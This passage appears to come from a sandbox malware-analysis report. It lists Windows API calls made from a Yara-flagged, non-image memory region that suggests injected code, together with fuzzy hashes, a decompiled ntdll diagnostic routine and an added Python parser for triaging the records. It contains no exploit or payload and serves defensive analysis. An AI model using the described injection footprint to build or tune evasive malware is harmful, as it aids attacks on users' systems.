                                          • Source File: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID: .z`
                                          • API String ID: 3298025750-1441809116
                                          • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                          • Instruction ID: 5602ae2ce595cd190a0303e93c356108a865df1c21e1b00511f2d242b98c70c6
                                          • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                          • Instruction Fuzzy Hash: 06E012B1200209ABDB18EF99CC49EA777ACAF88750F018558BA185B282C630E914CAB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00A9834A
                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00A9836B
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: e53b5b7ad0572521aa800ad7759a1ee729e3513d237bfdeb657aa77b8d8f0d4b
                                          • Instruction ID: 4358fba4bf785c4748335a30485f5f0f7892f1bd5518cd5ffed4da0c2e35027c
                                          • Opcode Fuzzy Hash: e53b5b7ad0572521aa800ad7759a1ee729e3513d237bfdeb657aa77b8d8f0d4b
                                          • Instruction Fuzzy Hash: D801B931A802187BEF20A6989D43FFE775C6B51B50F044559FE04FE1C1D699690542F5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00A9834A
                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00A9836B
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: c7fc2a5f69c1d358cb08d19fc6b82389f9e8c0a6b9b865c62a2b7bfc84e48788
                                          • Instruction ID: 63f77736494febd4f5fddacb542b63c205d20193db267e566241a5ef9b90ba0e
                                          • Opcode Fuzzy Hash: c7fc2a5f69c1d358cb08d19fc6b82389f9e8c0a6b9b865c62a2b7bfc84e48788
                                          • Instruction Fuzzy Hash: F1018431A802287AEB20A6989D03FBF766C6B51B50F044119FF04BE1C2E798690546F6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00AAA124
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: CreateInternalProcess
                                          • String ID:
                                          • API String ID: 2186235152-0
                                          • Opcode ID: b8503a2d71a2b669bb7460c07c055c94a0c7e3be4a5f022fec810fd7633f45b3
                                          • Instruction ID: 5380043d946ede3f67540608e641e904bc30460d4965ba7ef76ab727d6a9c0fb
                                          • Opcode Fuzzy Hash: b8503a2d71a2b669bb7460c07c055c94a0c7e3be4a5f022fec810fd7633f45b3
                                          • Instruction Fuzzy Hash: 05019DB2210108AFCB58CF99DC81EEB77ADAF8C354F158258FA0DA7251C630E851CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00AAA124
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: CreateInternalProcess
                                          • String ID:
                                          • API String ID: 2186235152-0
                                          • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                          • Instruction ID: 18e52c56ce5632e43cde2340c232913307853d68b4df6d8deabb747b3ca8fb88
                                          • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                          • Instruction Fuzzy Hash: 4801AFB2210108AFCB54DF89DC81EEB77ADAF8C754F158258BA0D97241C630E851CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00AA44F6,?,00AA4C6F,00AA4C6F,?,00AA44F6,?,?,?,?,?,00000000,00000000,?), ref: 00AAA04D
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                          • Instruction ID: b21401de038eb00be862a0cc7c3a4bd5990a5b5726d33c109ac2ab7e2a2bd06f
                                          • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                          • Instruction Fuzzy Hash: 59E012B1200208ABDB14EF99CC41EA777ACAF88650F118558BA185B282C630F914CAB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,00A9F192,00A9F192,?,00000000,?,?), ref: 00AAA1F0
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: LookupPrivilegeValue
                                          • String ID:
                                          • API String ID: 3899507212-0
                                          • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                          • Instruction ID: 221ab32ba7181affdb9c60fb5938a1fd0129890442312ba8cf1819f9ad432137
                                          • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                          • Instruction Fuzzy Hash: ABE01AB12002086BDB10DF49CC85EE737ADAF89650F018154BA0C57241CA30E8148BF5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetErrorMode.KERNELBASE(00008003,?,00A98CF4,?), ref: 00A9F6BB
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorMode
                                          • String ID:
                                          • API String ID: 2340568224-0
                                          • Opcode ID: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                          • Instruction ID: 0100ebdff841ead1454c13ba01fb70ca2fe8602590538c4874bc883773fb71e2
                                          • Opcode Fuzzy Hash: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                          • Instruction Fuzzy Hash: 02D0A7727903043BFA10FBA89C03F6632CC6B55B00F490074FA48DB3C3DA54F4004165
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.912852622.0000000004AE0000.00000040.00000001.sdmp, Offset: 04AE0000, based on PE: true
                                          • Associated: 0000000C.00000002.912976785.0000000004BFB000.00000040.00000001.sdmp
                                          • Associated: 0000000C.00000002.912987032.0000000004BFF000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: f6c4ba527b22d5644eca1ec327401bbc13172cccd317e37e74cf109f529a454a
                                          • Instruction ID: 6c1f4592b597b81112ebb4e35bf0e2bdbe409ae8a54c80d02c9cd19a3c8c264d
                                          • Opcode Fuzzy Hash: f6c4ba527b22d5644eca1ec327401bbc13172cccd317e37e74cf109f529a454a
                                          • Instruction Fuzzy Hash: 87B09BB29424C5C6FB51D77046087177914F7D4745F16C195D1020641A4778D0D1F5B5
                                          Uniqueness

                                          Uniqueness Score: -1.00%
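The function records above all follow one fixed layout: the API calls with their `ref:` address, the memory-dump source with its base address and whether it is a mapped PE, an optional "Yara matches" marker, then the API ID and the opcode and instruction fuzzy hashes. When triaging a report like this one, the useful pivot is to group the calls by dump region and to separate regions that are not a mapped image but still hit a Yara rule (on this report the region at 00A90000, where PostThreadMessageW, CreateProcessInternalW, RtlAllocateHeap, LookupPrivilegeValueW and SetErrorMode are called) from the mapped PE at 04AE0000. The parser below is an added example written for this page; it is not part of the Joe Sandbox report or its tooling. The record boundaries and field names it relies on are taken from the layout printed above, and the sample text embedded in it is constructed from three of the records shown here.

```python
import re
from collections import defaultdict

# Constructed sample in the report's own layout (bullets and field names as printed);
# the values are copied from the function records above.
SAMPLE = """\
APIs
Memory Dump Source
• Source File: 0000000C.00000002.912852622.0000000004AE0000.00000040.00000001.sdmp, Offset: 04AE0000, based on PE: true
• API ID: InitializeThunk
• API String ID: 2994545307-0
• Instruction Fuzzy Hash: 87B09BB29424C5C6FB51D77046087177914F7D4745F16C195D1020641A4778D0D1F5B5
Uniqueness Score: -1.00%

APIs
• PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00A9834A
• PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00A9836B
Memory Dump Source
• Source File: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
Yara matches
• API ID: MessagePostThread
• API String ID: 1836367815-0
• Instruction Fuzzy Hash: D801B931A802187BEF20A6989D43FFE775C6B51B50F044559FE04FE1C1D699690542F5
Uniqueness Score: -1.00%

APIs
• CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?), ref: 00AAA124
Memory Dump Source
• Source File: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
Yara matches
• API ID: CreateInternalProcess
• API String ID: 2186235152-0
• Instruction Fuzzy Hash: 05019DB2210108AFCB58CF99DC81EEB77ADAF8C354F158258FA0DA7251C630E851CBA4
Uniqueness Score: -1.00%
"""

API_CALL = re.compile(r"^• (\w+)\.(\w+)\((.*)\), ref: ([0-9A-Fa-f]+)$")
SOURCE = re.compile(r"^• Source File: (\S+), Offset: ([0-9A-Fa-f]+), based on PE: (true|false)$")
FIELD = re.compile(r"^• ([A-Za-z ]+?): ?(.*)$")


def parse_records(text):
    """One dict per function record: a record runs from an 'APIs' line to the next
    'Uniqueness Score' line; bullets under 'APIs' are calls, bullets under 'Strings'
    are string references, 'Yara matches' is a bare marker, the rest are fields."""
    records, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur, section = {"apis": [], "strings": [], "yara": False, "fields": {}}, "APIs"
            continue
        if cur is None:
            continue
        if line.startswith("Uniqueness Score"):
            records.append(cur)
            cur = None
        elif line in ("Strings", "Memory Dump Source", "Similarity"):
            section = line
        elif line == "Yara matches":
            cur["yara"] = True
        elif section == "Strings":
            if line.startswith("• "):
                cur["strings"].append(line[2:])
        elif section == "APIs" and (m := API_CALL.match(line)):
            func, module, args, ref = m.groups()
            cur["apis"].append({"module": module, "func": func,
                                "args": args.split(","), "ref": int(ref, 16)})
        elif m := SOURCE.match(line):
            cur["source"] = m.group(1)
            cur["offset"] = int(m.group(2), 16)
            cur["pe"] = m.group(3) == "true"
        elif m := FIELD.match(line):
            cur["fields"][m.group(1)] = m.group(2)
    return records


def api_usage_by_region(records):
    """Dump base address -> sorted 'MODULE!Function' names called from that region."""
    usage = defaultdict(set)
    for r in records:
        for call in r["apis"]:
            usage[r["offset"]].add(f"{call['module']}!{call['func']}")
    return {base: sorted(names) for base, names in usage.items()}


def injected_code_candidates(records):
    """Records from a region that is not a mapped PE image but matched a Yara rule:
    the footprint of code the sample wrote into the process itself."""
    return [r for r in records if not r["pe"] and r["yara"]]


def fuzzy_hashes(records):
    """Deduplicated instruction fuzzy hashes, a cheap pivot against other reports."""
    return sorted(r["fields"]["Instruction Fuzzy Hash"] for r in records
                  if "Instruction Fuzzy Hash" in r["fields"])
```

Running `api_usage_by_region(parse_records(SAMPLE))` yields one entry, for base 0xA90000, listing KERNELBASE!CreateProcessInternalW and USER32!PostThreadMessageW; the InitializeThunk record at 0x4AE0000 contributes no calls. The `ref` addresses in each call record are absolute addresses in the dump, so they can be handed straight to a disassembler opened on the corresponding .sdmp file with its base set to the record's Offset.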

                                          Non-executed Functions

                                          C-Code - Quality: 53%
                                          			// Decompiled critical-section timeout diagnostic. Offsets are the 32-bit ones:
                                          			// TEB+0x20/+0x24 = ClientId.UniqueProcess/UniqueThread,
                                          			// RTL_CRITICAL_SECTION+0xc = OwningThread,
                                          			// RTL_CRITICAL_SECTION_DEBUG+0x14 = ContentionCount. The two "RTL:" format
                                          			// strings are the ones ntdll uses on this path.
                                          			E04B9FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                          				void* _t7;
                                          				intOrPtr _t9;
                                          				intOrPtr _t10;
                                          				intOrPtr* _t12;
                                          				intOrPtr* _t13;
                                          				intOrPtr _t14;
                                          				intOrPtr* _t15;
                                          
                                          				_t13 = __edx;                                  // pointer to the 64-bit timeout (low dword, high dword)
                                          				_push(_a4);
                                          				_t14 =  *[fs:0x18];                            // TEB self pointer
                                          				_t15 = _t12;                                   // RTL_CRITICAL_SECTION*, arrives in a register the decompiler left unnamed
                                          				// 0xffffffffff676980 is -10,000,000: presumably a 64-bit divide that turns the
                                          				// negative relative timeout (100 ns units) into the seconds value printed below.
                                          				_t7 = E04B4CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                          				_push(_t13);
                                          				E04B95720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                          				_t9 =  *_t15;                                  // DebugInfo
                                          				if(_t9 == 0xffffffff) {                        // no debug info attached to this section
                                          					_t10 = 0;
                                          				} else {
                                          					_t10 =  *((intOrPtr*)(_t9 + 0x14));        // DebugInfo->ContentionCount
                                          				}
                                          				_push(_t10);
                                          				_push(_t15);                                   // Critical Section %p
                                          				_push( *((intOrPtr*)(_t15 + 0xc)));            // owner tid (OwningThread)
                                          				_push( *((intOrPtr*)(_t14 + 0x24)));           // Tid (TEB->ClientId.UniqueThread)
                                          				return E04B95720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));  // Pid (TEB->ClientId.UniqueProcess)
                                          			}

                                          Instruction addresses of the listing above (the report's address column): 0x04b9fdda to 0x04b9fe40.

                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04B9FDFA
                                          Strings
                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04B9FE2B
                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04B9FE01
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.912852622.0000000004AE0000.00000040.00000001.sdmp, Offset: 04AE0000, based on PE: true
                                          • Associated: 0000000C.00000002.912976785.0000000004BFB000.00000040.00000001.sdmp
                                          • Associated: 0000000C.00000002.912987032.0000000004BFF000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                          • API String ID: 885266447-3903918235
                                          • Opcode ID: 44f14164b973f7c804aee15121a7d98519f4066ae91f2631546ff9fa97d87463
                                          • Instruction ID: c4bc61895a733454cd7ae9fea4e8c9f97b4688b08fa2fac1de331ed6069dffce
                                          • Opcode Fuzzy Hash: 44f14164b973f7c804aee15121a7d98519f4066ae91f2631546ff9fa97d87463
                                          • Instruction Fuzzy Hash: 2DF0FC332405017FEA211A45DC05F737F9AEB44730F154354F614551D1EA62FD2097F4
                                          Uniqueness

                                          Uniqueness Score: -1.00%